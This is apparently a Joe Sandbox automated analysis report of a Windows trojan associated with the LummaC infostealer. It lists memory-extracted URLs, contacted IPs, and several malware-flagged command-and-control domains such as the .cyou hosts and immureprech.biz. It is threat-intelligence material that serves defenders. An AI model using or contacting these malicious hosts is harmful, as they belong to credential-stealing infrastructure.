                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://steamcommunity.ccN1sb7Ii2YD.exe, 00000000.00000003.2252043766.0000000000796000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.0000000000797000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://help.steampowered.com/en/N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://steamcommunity.com/market/N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://store.steampowered.com/news/N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313987284.0000000000811000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313987284.0000000000811000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://recaptcha.net/recaptcha/;N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://steamcommunity.com/discussions/N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://store.steampowered.com/stats/N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://medal.tvN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://broadcast.st.dl.eccdnx.comN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngN1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://store.steampowered.com/steam_refunds/N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://sordid-snaked.cyou/apizoN1sb7Ii2YD.exe, 00000000.00000003.2252043766.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                unknown
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://steamcommunity.com/workshop/N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://login.steampowered.com/N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://store.steampowered.com/legal/N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313987284.0000000000811000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&aN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://recaptcha.netN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://upx.sf.netAmcache.hve.4.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://store.steampowered.com/N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngN1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://127.0.0.1:27060N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgN1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gifN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://wrathful-jammy.cyou/apijN1sb7Ii2YD.exe, 00000000.00000003.2252043766.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://awake-weaves.cyou/api1uoiN1sb7Ii2YD.exe, 00000000.00000003.2252043766.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://help.steampowered.com/N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://api.steampowered.com/N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://store.steampowered.com/account/cookiepreferences/N1sb7Ii2YD.exe, 00000000.00000002.2313690729.0000000000773000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313987284.0000000000811000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252151809.0000000000773000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://sordid-snaked.cyou/apiN1sb7Ii2YD.exe, 00000000.00000003.2252043766.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://store.steampowered.com/mobileN1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                              178.62.201.34
                                                                                                                                                                                                                              immureprech.bizEuropean Union
                                                                                                                                                                                                                              14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                              104.121.10.34
                                                                                                                                                                                                                              steamcommunity.comUnited States
                                                                                                                                                                                                                              16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                              Analysis ID:1576506
                                                                                                                                                                                                                              Start date and time:2024-12-17 08:13:07 +01:00
                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                              Overall analysis duration:0h 5m 12s
                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                              Number of analysed new started processes analysed:7
                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                              Sample name:N1sb7Ii2YD.exe
                                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                                              Original Sample Name:b5bd4911ad7b091685625baf619caa97.exe
                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                              Classification:mal100.troj.evad.winEXE@2/5@12/2
                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                              • Successful, ratio: 98%
                                                                                                                                                                                                                              • Number of executed functions: 15
                                                                                                                                                                                                                              • Number of non-executed functions: 234
                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.63, 40.126.53.8, 20.109.210.53
                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                              • VT rate limit hit for: N1sb7Ii2YD.exe
                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                              02:13:59API Interceptor9x Sleep call for process: N1sb7Ii2YD.exe modified
                                                                                                                                                                                                                              02:14:16API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              178.62.201.34java.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                                                              • uyhgqunqkxnx.pw/EiDQjNbWEQ/
                                                                                                                                                                                                                              104.121.10.34file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                      PHuHRcCpaJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        EI0WLvSYFS.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                          b6FArHy7yA.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                fukjsefsdfh.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  immureprech.bizfile.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                  • 178.62.201.34
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.131.68.180
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.131.68.180
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                  • 45.77.249.79
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.131.68.180
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                  • 172.67.207.38
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  • 172.67.207.38
                                                                                                                                                                                                                                                  wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.22.222
                                                                                                                                                                                                                                                  AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 172.67.207.38
                                                                                                                                                                                                                                                  I37faEaz1K.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 172.67.207.38
                                                                                                                                                                                                                                                  deafeninggeh.bizfile.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.131.68.180
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 178.62.201.34
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.131.68.180
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                  • 45.77.249.79
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                  • 45.77.249.79
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                  • 104.21.16.1
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  • 104.21.64.1
                                                                                                                                                                                                                                                  wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.16.1
                                                                                                                                                                                                                                                  AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.16.1
                                                                                                                                                                                                                                                  I37faEaz1K.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.21.48.1
                                                                                                                                                                                                                                                  steamcommunity.comfile.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                  • 23.37.186.133
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  • 23.37.186.133
                                                                                                                                                                                                                                                  njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.102.49.254
